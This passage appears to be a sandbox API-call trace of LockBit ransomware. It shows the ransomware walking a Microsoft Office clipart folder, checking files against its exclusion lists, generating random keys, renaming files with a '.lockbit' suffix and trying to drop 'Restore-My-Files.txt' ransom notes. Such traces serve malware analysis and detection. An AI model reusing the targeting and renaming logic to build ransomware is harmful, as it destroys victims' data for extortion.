lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.342] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304371.WMF.lockbit") returned 72 [0157.343] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304371.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304371.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.344] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.344] malloc (_Size=0x40068) returned 0x3df0008 [0157.344] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3616) returned 1 [0157.344] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.344] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.345] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.345] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.345] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.345] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.781] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304371.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304371.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.781] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.781] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0157.781] free (_Block=0x1fa2ed8) [0157.781] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304371.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.782] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.782] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.782] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56726050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x103e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0304405.WMF", cAlternateFileName="")) returned 1 [0157.782] lstrcmpiW (lpString1=".", lpString2="J0304405.WMF") returned -1 [0157.782] lstrcmpiW (lpString1="..", lpString2="J0304405.WMF") returned -1 [0157.782] PathFindExtensionW (pszPath="J0304405.WMF") returned=".WMF" [0157.782] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.782] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.782] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.782] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.782] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.782] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.782] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.782] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.783] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.784] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.784] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0304405.WMF") returned 1 [0157.785] lstrcmpiW (lpString1="ntldr", lpString2="J0304405.WMF") returned 1 [0157.785] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0304405.WMF") returned 1 [0157.785] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0304405.WMF") returned -1 [0157.785] lstrcmpiW (lpString1="autorun.inf", lpString2="J0304405.WMF") returned -1 [0157.785] lstrcmpiW (lpString1="thumbs.db", lpString2="J0304405.WMF") returned 1 [0157.785] lstrcmpiW (lpString1="iconcache.db", lpString2="J0304405.WMF") returned -1 [0157.785] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.785] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304405.WMF") returned=".WMF" [0157.785] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.785] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.785] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.786] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.787] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.787] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.787] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.787] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.787] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.787] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.787] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304405.WMF.lockbit") returned 72 [0157.787] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304405.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304405.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.788] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.788] malloc (_Size=0x40068) returned 0x3df0008 [0157.788] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=4158) returned 1 [0157.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.789] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.790] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.790] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.790] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.833] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304405.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304405.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.833] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.833] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0157.834] free (_Block=0x1fa2ed8) [0157.834] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304405.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.834] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.835] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.835] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56726050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4a0e, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0304853.WMF", cAlternateFileName="")) returned 1 [0157.835] lstrcmpiW (lpString1=".", lpString2="J0304853.WMF") returned -1 [0157.835] lstrcmpiW (lpString1="..", lpString2="J0304853.WMF") returned -1 [0157.835] PathFindExtensionW (pszPath="J0304853.WMF") returned=".WMF" [0157.835] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.835] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.836] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.836] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0304853.WMF") returned 1 [0157.837] lstrcmpiW (lpString1="ntldr", lpString2="J0304853.WMF") returned 1 [0157.837] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0304853.WMF") returned 1 [0157.837] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0304853.WMF") returned -1 [0157.837] lstrcmpiW (lpString1="autorun.inf", lpString2="J0304853.WMF") returned -1 [0157.837] lstrcmpiW (lpString1="thumbs.db", lpString2="J0304853.WMF") returned 1 [0157.837] lstrcmpiW (lpString1="iconcache.db", lpString2="J0304853.WMF") returned -1 [0157.837] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.837] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF") returned=".WMF" [0157.837] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.837] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.837] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.838] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.839] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.839] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.839] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.839] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF.lockbit") returned 72 [0157.839] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0304853.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.840] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.840] malloc (_Size=0x40068) returned 0x3df0008 [0157.840] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=18958) returned 1 [0157.840] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.841] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.841] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.841] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.841] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.843] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.843] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.844] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.845] free (_Block=0x1fa2ed8) [0157.845] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304853.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.845] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.845] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.845] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66162910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x2cf8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0304861.WMF", cAlternateFileName="")) returned 1 [0157.845] lstrcmpiW (lpString1=".", lpString2="J0304861.WMF") returned -1 [0157.845] lstrcmpiW (lpString1="..", lpString2="J0304861.WMF") returned -1 [0157.845] PathFindExtensionW (pszPath="J0304861.WMF") returned=".WMF" [0157.845] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.845] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.845] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.845] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.845] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.846] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.846] 